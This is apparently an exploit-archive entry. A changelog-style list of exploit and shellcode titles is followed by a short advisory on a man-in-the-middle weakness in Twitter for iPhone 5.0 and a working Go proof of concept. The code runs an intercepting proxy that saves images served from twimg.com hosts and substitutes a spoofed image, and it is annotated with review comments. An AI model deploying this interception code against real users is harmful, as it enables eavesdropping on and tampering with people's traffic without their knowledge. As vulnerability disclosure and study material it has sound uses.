
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 
bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
source: https://www.securityfocus.com/bid/56665/info
Twitter for iPhone is prone to a security vulnerability that lets attackers perform a man-in-the-middle attack.
Attackers can exploit this issue to capture and modify pictures that the user sees in the application.
Twitter for iPhone 5.0 is vulnerable; other versions may also be affected.
/*
Twitter App, eavesdropping PoC
Written by Carlos Reventlov <carlos@reventlov.com>
License MIT
*/
package main
import (
"fmt"
"github.com/xiam/hyperfox/proxy"
"github.com/xiam/hyperfox/tools/logger"
"io"
"log"
"os"
"path"
"strconv"
"strings"
)
// imageFile is the path of the replacement image. The name is relative, so it
// is resolved against the working directory of the process.
const imageFile = "spoof.jpg"
// init refuses to start the proof of concept when the replacement image
// cannot be stat'ed: any os.Stat failure on imageFile becomes a panic that
// carries the error text.
func init() {
	if _, statErr := os.Stat(imageFile); statErr != nil {
		panic(statErr.Error())
	}
}
// replaceAvatar is the proxy interceptor of this proof of concept. For a
// response whose request host ends in "twimg.com" it optionally stores the
// original image body under the "saved" directory and then rewrites the
// response so that the client receives imageFile instead. Responses for any
// other host are left untouched. It always returns nil.
//
// Defensive reading: the rewrite depends on the proxy being able to read and
// alter the response in transit. NOTE(review): the advisory text on this page
// describes a man-in-the-middle weakness in the client; presumably the image
// traffic was fetched without authenticated transport (TLS with certificate
// validation). Confirm against the advisory before relying on that.
//
// NOTE(review): every error from os.Stat, os.Open, os.MkdirAll, os.Create and
// io.Copy is discarded here, and the replacement file is opened before the
// host check even when it ends up unused.
func replaceAvatar(pr *proxy.ProxyRequest) error {
	info, _ := os.Stat(imageFile)
	spoof, _ := os.Open(imageFile)

	// Anything that is not served from a *twimg.com host passes through.
	if !strings.HasSuffix(pr.Response.Request.Host, "twimg.com") {
		return nil
	}

	if pr.Response.ContentLength != 0 {
		// NOTE(review): pr.FileName comes from the proxy library; if it is
		// derived from the request path it should be confined to "saved".
		// Verify against the library.
		target := "saved" + proxy.PS + pr.FileName

		// Only these content types are written to disk; any other value maps
		// to the empty string and the copy is skipped. The extension itself is
		// used only as a gate and is not appended to target.
		extByType := map[string]string{
			"image/jpeg": ".jpg",
			"image/gif":  ".gif",
			"image/png":  ".png",
			"image/tiff": ".tiff",
		}

		if extByType[pr.Response.Header.Get("Content-Type")] != "" {
			fmt.Printf("** Saving image.\n")

			os.MkdirAll(path.Dir(target), os.ModeDir|os.FileMode(0755))

			out, _ := os.Create(target)
			if out == nil {
				// The error value is constructed and then dropped, so a failed
				// create is neither reported nor returned.
				fmt.Errorf(fmt.Sprintf("Could not open file %s for writing.", target))
			}

			io.Copy(out, pr.Response.Body)
			out.Close()
			pr.Response.Body.Close()
		}
	}

	fmt.Printf("** Sending bogus image.\n")

	// Length and type headers are rewritten to describe the replacement file
	// before its handle is installed as the response body.
	pr.Response.ContentLength = info.Size()
	pr.Response.Header.Set("Content-Type", "image/jpeg")
	pr.Response.Header.Set("Content-Length", strconv.Itoa(int(pr.Response.ContentLength)))
	pr.Response.Body = spoof

	return nil
}
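// main wires the proof of concept together: it creates a hyperfox proxy,
// registers a client logger on stdout as director, replaceAvatar as
// interceptor and a server logger on stdout, then starts the proxy. A start
// failure is logged and the function returns.
func main() {
	p := proxy.New()

	p.AddDirector(logger.Client(os.Stdout))
	p.AddInterceptor(replaceAvatar)
	p.AddLogger(logger.Server(os.Stdout))

	if err := p.Start(); err != nil {
		// Pass the error text as an argument, not as the format string, so a
		// '%' inside the message is printed literally instead of being parsed
		// as a formatting verb.
		log.Printf("Failed to bind: %s.\n", err.Error())
	}
}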